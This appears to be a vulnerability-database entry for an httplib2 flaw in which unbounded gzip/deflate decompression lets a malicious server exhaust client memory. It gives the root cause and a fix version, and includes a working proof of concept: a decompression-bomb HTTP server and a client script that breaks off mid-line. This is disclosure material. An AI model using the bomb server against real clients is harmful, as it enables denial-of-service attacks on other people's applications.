A AegiFlow
HIGHCVSS 7.5EPSS 0.4%

CVE-2026-59939

httplib2: Decompression Bomb Denial of Service via Unbounded gzip/deflate Response Handling

Published
2026-07-24
Modified
2026-07-24
EPSS percentile
34%
Aliases
GHSA-j5g9-f88f-gfj3
Sources
github-advisory

Summary

### Summary The `httplib2` HTTP client library performs unbounded decompression of HTTP response bodies encoded with `Content-Encoding: gzip` or `deflate`. A malicious or compromised HTTP server can return a small compressed payload (approximately 150 KB) that expands to an arbitrarily large size in memory (150 MB or more), causing `MemoryError` or OOM-kill in the client process. This is a classic decompression bomb (zip bomb) attack against the HTTP client. Any application using `httplib2.Http().request()` against untrusted or attacker-controlled HTTP endpoints is affected. ### Details **Affected code:** `httplib2/__init__.py` - `_decompressContent()` function The decompression path has two unbounded operations: 1. **gzip decompression** (line 394): ```python content = gzip.GzipFile(fileobj=io.BytesIO(new_content)).read() ``` The `.read()` call with no size argument decompresses the entire gzip payload into a single in-memory bytes object. There is no limit on the decompressed size. 2. **deflate decompression** (line 397): ```python content = zlib.decompress(content, zlib.MAX_WBITS) ``` Similarly, `zlib.decompress()` returns the fully decompressed content as a single bytes object with no size bound. 3. **Automatic invocation** (line 1431): `_decompressContent()` is called automatically on every HTTP response that includes a `Content-Encoding: gzip` or `deflate` header. The full compressed body is already buffered in memory via `response.read()` before decompression begins. **Root cause:** There is no `max_decompressed_size`, streaming decompression with size tracking, or decompression ratio check anywhere in the decompression path. The library unconditionally trusts the server's compressed payload size. **Attack vector:** Any HTTP server (including man-in-the-middle attackers or compromised upstream services) can trigger this by returning a response with: - `Content-Encoding: gzip` header - A small compressed body that decompresses to an arbitrarily large size ### Proof of Concept **Step 1 - Start a malicious HTTP server that serves a gzip decompression bomb:** ```python #!/usr/bin/env python3 """Malicious HTTP server that serves a gzip decompression bomb.""" import gzip import http.server import io import socketserver UNCOMPRESSED_SIZE = 150 * 1024 * 1024 # 150 MB def make_payload(): """Create a gzip payload: ~150 KB compressed -> 150 MB decompressed.""" buf = io.BytesIO() with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz: chunk = b"A" * (1024 * 1024) # 1 MB of repeating bytes for _ in range(UNCOMPRESSED_SIZE // len(chunk)): gz.write(chunk) return buf.getvalue() PAYLOAD = make_payload() class Handler(http.server.BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Encoding", "gzip") self.send_header("Content-Length", str(len(PAYLOAD))) self.end_headers() self.wfile.write(PAYLOAD) def log_message(self, fmt, *args): pass with socketserver.TCPServer(("127.0.0.1", 8000), Handler) as httpd: print(f"Bomb server ready: {len(PAYLOAD)} bytes compressed -> " f"{UNCOMPRESSED_SIZE} bytes decompressed") httpd.serve_forever() ``` **Step 2 - Run the httplib2 client (in a separate terminal):** ```python #!/usr/bin/env python3 """Client that demonstrates MemoryError from httplib2 decompression bomb.""" import resource import httplib2 # Set a 180 MB memory limit to make the crash deterministic LIMIT_MB = 180 limit = LIMIT_MB * 1024 * 1024 resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) http = httplib2.Http(timeout=5) try: response, content = http.request("http://127.0.0.1:8000/") print(f"Unexpected success: received {len(content)} bytes") except MemoryError: print(f"MemoryError confirmed: decompression bomb exhausted " f"{LIMIT_

Affected packages

EcosystemPackageAffected versionsFixed versions
PyPIhttplib20.32.0

Remediation: Upgrade to 0.32.0 or later.

References

Includes data from the GitHub Advisory Database, licensed under CC-BY 4.0.

CVE® is a registered trademark of The MITRE Corporation. CVE content reproduced under the CVE Terms of Use; copyright designation © MITRE.

EPSS scores provided by the FIRST.org Exploit Prediction Scoring System.